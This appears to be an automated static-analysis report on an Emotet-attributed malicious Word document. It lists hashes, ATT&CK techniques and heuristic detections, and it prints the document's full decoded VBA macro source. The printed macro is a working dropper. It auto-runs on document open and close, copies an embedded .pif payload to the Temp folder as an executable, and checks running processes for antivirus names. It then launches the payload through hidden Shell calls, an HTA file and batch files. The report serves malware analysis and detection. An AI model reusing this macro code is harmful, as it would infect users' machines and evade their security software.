Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 73d7f5cabfc82d7b…

MALICIOUS

Office (OLE)

Size: 223.5 KB
Created: 2018-10-29 14:43:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 0b19eede49b4f7d0aff8c6270caa28d3
SHA-1: eede0da5e111bb902a2a478ae45d2d3a85e78ae7
SHA-256: 73d7f5cabfc82d7bd8a54e03ecb51567d81ac5dfa8dc1bd36670daede4e6c482
Risk Score: 798

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1218.011 System Binary Proxy Execution: Rundll32
  • T1059.003 Windows Command Shell
  • T1140 Deobfuscate or Obfuscate
  • T1566.001 Spearphishing Attachment
  • T1027 Obfuscated Files or Information

The sample is a malicious Word document containing VBA macros. The Document_Open macro is designed to execute a Base64-decoded shell command, which is 'cmd.exe /c ping localhost -n 100 &&'. This macro also leverages WMI to launch processes and attempts to embed and execute a PE executable. The ClamAV detection and heuristic firings strongly indicate this is a downloader, likely Emotet, used for initial payload delivery.

Heuristics 20

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Downloader.Emotet-10024800-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10024800-0
  • XOR-encoded strings (key 0xEF) critical SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xEF: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly hidden — these bytes score as data, not coherent x86 code (0/1 branch targets land on an instruction boundary (0% coherence)).
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Open Environ("Temp") & "\1.hta" For Output As #1
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography - In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8431 bytes
SHA-256: bacb0b4802c953faf24c2bfa7723656ade696af6e53911cfece8e5f278b283d8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next


    Selection.MoveDown Unit:=wdScreen, Count:=7
    
    Selection.MoveDown Unit:=wdScreen, Count:=7
    
 Selection.MoveRight Unit:=wdCharacter, Count:=24
 
    Selection.TypeBackspace
    
        Selection.Copy


Call sdfsdf

Call cek


Call killo

End Sub

Private Sub Document_Close()
Call closee

End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function


Attribute VB_Name = "bbbbbbb"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Attribute VB_Name = "eeeeee"
Sub closee()
  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 15, t)

Dim jddsdfda

jddsdfda = UserForm5.TextBox1.Text
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Dim nuchevi
nuchevi = UserForm6.TextBox1.Text
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In yrtfdsad
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
Dim pipec As Boolean: pipec = True
 
 Dim lhjxvcvx
 lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode)
 Dim kap
 kap = x.Name
Dim kkkdds
kkkdds = StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
 
If kap = jddsdfda Then
Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, kkkdds
  Print #1, lhjxvcvx
  Close #1
  
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
   End If
    
   
    If x.Name = "PSUAMain" & nuchevi Then

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
   
       If x.Name = "n360" & nuchevi Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
     If x.Name = "PccNT" & nuchevi Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
        If x.Name = "uiSeAgnt" & nuchevi Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If


     If x.Name = "mbam" & nuchevi Then
     Open Environ("Temp") & "\1s.bat" For Output As #1
  Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
  Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
  Close
  
     Shell Environ("Temp") & "\1s.bat", vbHide


Exit Sub
   End If
   If x.Name = "mbamtray" & nuchevi Then
     Open Environ("Temp") & "\1s.bat" For Output As #1
  Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
  Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
  Close
  
     Shell Environ("Temp") & "\1s.bat", vbHide


Exit Sub
   End If
   

Next




Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("X" & "DYuc" & "Glm"), vbUnicode), vbHide


End Sub


Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function




Attribute VB_Name = "Aaaaaa"
Sub cek()
 Set D = New DataObject
    D.SetText "  "
    D.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)
End Sub

Attribute VB_Name = "cccccc"

Sub fadf()
kk = ".p" & "if"

   Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")

FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif"
End Sub

Sub sdfsdf()
ChDir Environ("Temp")
Call kklk
Call fadf

Selection.TypeBackspace


End Sub

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{0609BFE0-13A1-42D9-862F-B8D0813084EF}{F4B5098B-7C44-49CB-BC22-630ED6561953}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{FAF1ABEA-310A-4B71-84A7-7961FCB9BE4B}{F1B6EBB9-28C6-4F2E-9695-EB4E7C2C39AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ddddd"
Sub kklk()
   
 ChDir Environ("Temp")
Dim kk, lll, jgf, tyretw, gdfsfsa

jgf = StrConv(DecodeBase64("ZXhl"), vbUnicode)


kk = ".p" & "if"
lll = "6" & "."
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")


FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf



End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{38581714-50CA-4DE7-9E3E-B90DD8BAA043}{F5F68FD6-D021-4C9B-8D64-19FC7A82946F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{11CB1218-853F-4C2C-AF08-F14AA2CDBD21}{7D1A9A05-224C-4650-A5FE-6176343F3920}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{E3D2233B-77D4-4BC7-86F5-35C2E033DAF3}{D6DABEEC-6521-4AC5-9794-70098E86D1A7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{08BDF32A-1DBB-41D5-BB7B-8950BD024589}{2DDE070B-868D-4150-977A-ACC46B381360}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
embedded_office_0001465a.exe | embedded-pe | Office MZ+PE at offset 0x1465A | 145318 bytes
SHA-256: 2809951911d9b4dd1e2393bfae8206d34bda4468f26969ca93cbbc923a6cd7cf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1602304139/Ole10Native | 82160 bytes
SHA-256: 4ae29f92cdf831237f8cec9934fbb196cdd5d8e883d0eccc934ee3408deaf4d9
ole10native_00_5C.pif | ole-package-payload | OLE Ole10Native payload: ObjectPool/_1602304139/Ole10Native; display_name=5C.pif; full_path=C:\Users\Admin\AppData\Local\Temp\5C.pif; temp_path=; def_file= | 81920 bytes
SHA-256: 846d1e1d019d5bc2a05940b119e19a07643f2e3851184f843960cfd949280894